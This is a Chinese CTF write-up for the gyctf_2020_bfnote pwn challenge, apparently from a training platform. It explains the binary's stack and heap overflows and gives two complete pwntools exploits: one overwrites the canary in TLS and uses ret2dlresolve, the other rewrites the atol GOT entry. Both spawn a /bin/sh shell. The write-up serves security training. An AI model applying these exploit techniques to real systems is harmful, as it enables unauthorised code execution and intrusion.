题目链接:https://buuoj.cn/challenges#gyctf_2020_bfnote

首先检查程序开的保护:

发现程序只开了canary和NX保护,接下来查看IDA反汇编出来的为代码,发现在输入description时存在栈溢出:

在输入note时存在堆溢出:

本题的难点在于不能通过覆盖canary的低字节来泄漏canary,也不好泄漏libc基址来构造ROP。

解法一:

canary是Linux的栈溢出保护机制,通常情况下是保存在TLS结构体中,而TLS结构体是由mmap分配的内存空间,故给了我们利用的可能。

利用思路:

  • 分配一个大小为0x200000的chunk,此时会调用mmap分配内存
  • 由上文的堆溢出漏洞可知,我们只要控制好v4的值,就可以向TLS结构体中写入数据,从而覆盖原有的canary
  • 绕过canary保护后通过把栈迁移到.bss段
  • ret2_dl_runtime_resolve

在构造ret2_dl_runtime_resolve时要注意利用的.bss地址不要过大或过小

ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;

version = &l->l_versions[ndx]; //在伪造时注意此处下标过大会指向非法地址导致失败

最终利用脚本:

#-*- coding:utf-8 -*-

from pwn import *

context(os = 'linux', arch = 'i386', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./BFnote')

#p = remote('node3.buuoj.cn', 28177)

elf = ELF('BFnote')

libc = ELF('libc.so.6')

atol_got = elf.got['atol']

leave_ret = 0x08048578

read_plt = elf.plt['read']

pop_esi_edi_ebp_ret = 0x080489d9

pop_ebp_ret = 0x080489db

plt_0 = 0x08048450

_rel_plt = 0x080483d0

dynsym = 0x080481d8

dynstr = 0x080482c8

p.recvuntil('Give your description : ')

payload = 'A'*50 + '\x00\x41\x41\x41' + 'AAAA' + p32(0x0804a064)

p.sendline(payload)

p.recvuntil('Give your postscript : ')

payload = p32(read_plt) + p32(pop_esi_edi_ebp_ret) + p32(0) + p32(0x0804a400) + p32(100) + p32(pop_ebp_ret) + p32(0x0804a400) + p32(leave_ret)

payload = payload.ljust(0x600, '\x00')

p.send(payload)

p.recvuntil('Give your notebook size : ')

p.sendline(str(0x200000))

p.recvuntil('Give your title size : ')

p.sendline(str(0x2016fc))

p.recvuntil('please re-enter :\n')

p.sendline('16')

p.recvuntil('Give your title : ')

p.sendline('CCCCCCCCCCCCC')

p.recvuntil('Give your note : ')

p.send('\x00\x41\x41\x41')

index_offset = 0x0804a41c - _rel_plt

r_offset = atol_got

r_info = (((0x0804a428 - dynsym) / 0x10) << 8) | 0x07

fake_reloc = p32(r_offset) + p32(r_info)

offset = 0x0804a400 + 0x50 - dynstr

fake_dynsym = p32(offset) + p32(0) + p32(0) + p32(0x12)

payload2 = 'AAAA'

payload2 += p32(plt_0)

payload2 += p32(index_offset)

payload2 += 'AAAA' #函数返回地址,此处可随意

payload2 += p32(0x0804a400 + 0x50 + 0x8) #/bin/sh地址

payload2 += p32(0)

payload2 += p32(0)

payload2 += fake_reloc #0x0804a41c

payload2 += 'AAAA'

payload2 += fake_dynsym #0x0804a428

payload2 += 'A'*(80 - len(payload2))

payload2 += 'execve\x00\x00'

payload2 += '/bin/sh\x00'

payload2 += 'A'*(100 - len(payload2))

#gdb.attach(p)

p.send(payload2)

p.interactive()

解法二:

通过调试我们可以发现atol函数的地址低于system函数的地址,用命令ROPgadget --binary BFnote --only 'inc|ret'发现程序有这样一段gadget:

通过调试发现除去最低位后atol和system函数地址偏移相差0xdb

利用思路:

  • 利用inc把atol地址加0xdb
  • 向atol的最低位写入'\xa0'

最终exp如下:

#-*- coding:utf-8 -*-

from pwn import *

context(os = 'linux', arch = 'i386', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./BFnote')

#p = remote('node3.buuoj.cn', 28092)

elf = ELF('BFnote')

libc = ELF('libc.so.6')

atol_got = elf.got['atol']

atol_plt = elf.plt['atol']

leave_ret = 0x08048578

read_plt = elf.plt['read']

pop_esi_edi_ebp_ret = 0x080489d9

pop_ebp_ret = 0x080489db

plt_0 = 0x08048450

_rel_plt = 0x080483d0

dynsym = 0x080481d8

dynstr = 0x080482c8

inc_ebp_ret = 0x08048434

ret_addr = 0x0804842a

p.recvuntil('Give your description : ')

payload = 'A'*50 + '\x00\x41\x41\x41' + 'AAAA' + p32(0x0804a204) #栈迁移到0x0804a500处

p.sendline(payload)

p.recvuntil('Give your postscript : ')

payload  = '/bin/sh\x00'.ljust(0x1a0, '\x00')

payload += p32(pop_ebp_ret) + p32(atol_got + 1 + 0x17fa8b40)

payload += p32(inc_ebp_ret) * 0xDB

payload += p32(read_plt) + p32(pop_esi_edi_ebp_ret) + p32(0) + p32(atol_got) + p32(1) + p32(ret_addr) + p32(ret_addr) + p32(atol_plt) + 'AAAA' + p32(0x0804a060)

info("length of payload ==> " + str(len(payload)))

payload  = payload.ljust(0x600, '\x00')

#gdb.attach(p)

p.send(payload)

p.recvuntil('Give your notebook size : ')

#gdb.attach(p)

p.sendline(str(0x200000))

p.recvuntil('Give your title size : ')

p.sendline(str(0x2016fc))

p.recvuntil('please re-enter :\n')

#gdb.attach(p)

p.sendline('16')

p.recvuntil('Give your title : ')

p.sendline('CCCCCCCCCCCCC')

p.recvuntil('Give your note : ')

#gdb.attach(p)

p.send('\x00\x41\x41\x41')

#gdb.attach(p)

p.send('\xA0')

p.interactive()

i春秋公益赛之BFnote的更多相关文章

  1. i春秋公益赛 ezpload

    题目思路:一看解出的人比较多,emmm,传个马,命令执行一下.最后读到flag文件. /readflag,可执行. 题对萌新比较友好...... 考点:Linux命令,文件上传,命令执行. http: ...

  2. i春秋公益赛之signin

    题目链接:https://buuoj.cn/challenges#gyctf_2020_signin 查看程序保护 只开了canary和NX保护,在IDA查看反编译出来的为代码时发现程序给了一个后门 ...

  3. i春秋第二届春秋欢乐赛RSA256writeup

    i春秋第二届春秋欢乐赛writeup 下载之后进行解压 发现四个文件 0x01看到题目是RSA的  又看到public.key 所以直接用kali linux的openssl 0x02可以看到e就是E ...

  4. 2020 i春秋新春战疫公益赛 misc

    0x01 code_in_morse morse decode后得到: RFIE4RYNBINAUAAAAAGUSSCEKIAAAAEUAAAAA7AIAYAAAAEPFOMTWAAABANUSRCB ...

  5. i春秋2020新春公益赛WP

    Re Factory 主函数fork了一个子进程,父进程添加了一个信号处理器用于比对input,然后死循环挂起.子进程读入input,然后调用了关键函数. 跟进关键函数,发现是从一段内存中读取数据,然 ...

  6. 2017 百度杯丶春秋欢乐赛 writeup

    1. 内涵图(Misc) 题目: 我不是一个简单的图片 我是一个有内涵的图片 解:保存到桌面,右键属性->详细信息,即可获得flag. 2. 小电影(Misc) 题目: 我说过 这次比赛是让大家 ...

  7. 2020新春公益赛 writeup

    简单的招聘系统 无需注册账号,admin'or 1#登陆,到blank page页面,在输入key处发现有注入点: /pages-blank.php?key=1%27+union+select+1%2 ...

  8. CTF中的命令执行绕过

    本位原创作者:Smity 在介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同.他们的区别在于,远程代码执行实际上是调用服务器网站代码进行执行,而命令注入则是调用操作系统命令进行执行. 作为 ...

  9. CTF练习三 —— 命令注入&命令执行绕过

    这个题是第四届强网杯也就是2020.8.22号开始的那场一道简单的命令注入题,再这之前我并没有学习过命令注之类的知识,,,看到题之后先搜在学,,误打误撞解了出来,过段时间wp就会放出来,所以这里就不对 ...

随机推荐

  1. Xlua中LuaBehaviour的实现

    简介   在基于lua进行热更新的项目中,我们通常会通过luaBehaviour来让lua文件模拟MonoBehaviour,可以让lua文件拥有一些MonoBehaviour的生命周期,如Enabl ...

  2. C++实现二叉树的链接存储结构(先根、中根和后根遍历)

    验证二叉树的链接存储结构及其上的基本操作. [实验要求]: 1. 从文件创建一棵二叉树,并对其初始化: 2. 先根.中根.后根遍历二叉树: 3. 在二叉树中搜索给定结点的父结点: 4. 搜索二叉树中符 ...

  3. 2020-06-16:Redis hgetall时间复杂度?

    福哥答案2020-06-16: 时间复杂度是O(N).时间复杂度:O(N) where N is the size of the hash.

  4. C#LeetCode刷题-堆

    堆篇 # 题名 刷题 通过率 难度 23 合并K个排序链表   39.4% 困难 215 数组中的第K个最大元素   51.5% 中等 218 天际线问题   32.9% 困难 239 滑动窗口最大值 ...

  5. My_Tomcat_Host 靶机

    1:扫描网段: 发现主机IP为192.168.1.203 2:nmap 扫描端口信息 发现8080端口开启了http服务  22ssh服务 3:尝试ssh连接是需要密码的,然后访问8080端口 4:发 ...

  6. 在.NET Core中使用MongoDB明细教程(1):驱动基础及文档插入

    MongoDB,被归类为NoSQL数据库,是一个以类JSON格式存储数据的面向文档的数据库系统.MongoDB在底层以名为bson的二进制编码格式表示JSON文档,MongoDB bson实现是轻量级 ...

  7. Python基础入门知识点——Python中的异常

    前言 在先前的一些章节里你已经执行了一些代码,你一定遇到了程序“崩溃”或因未解决的错误而终止的情况.你会看到“跟踪记录(traceback)”消息以及随后解释器向你提供的信息,包括错误的名称.原因和发 ...

  8. 浏览器自动化的一些体会9 webBrowser控件之零碎问题3

    WebBrowser控件最大的优点是可以轻松嵌入win form程序中,但是微软好像对这个控件没什么兴趣,这么多年了还没有改进,结果造成一堆问题. 1. 不支持https 2. 缺省模拟ie 7,如果 ...

  9. SpringSecurity权限管理系统实战—四、整合SpringSecurity(上)

    目录 SpringSecurity权限管理系统实战-一.项目简介和开发环境准备 SpringSecurity权限管理系统实战-二.日志.接口文档等实现 SpringSecurity权限管理系统实战-三 ...

  10. apache+djnago+websocket 部署配置

    部署Apache服务器 1.apache服务的安装这里不做赘述,因为网上一大堆. 链接:https://blog.csdn.net/qq_24394093/article/details/905501 ...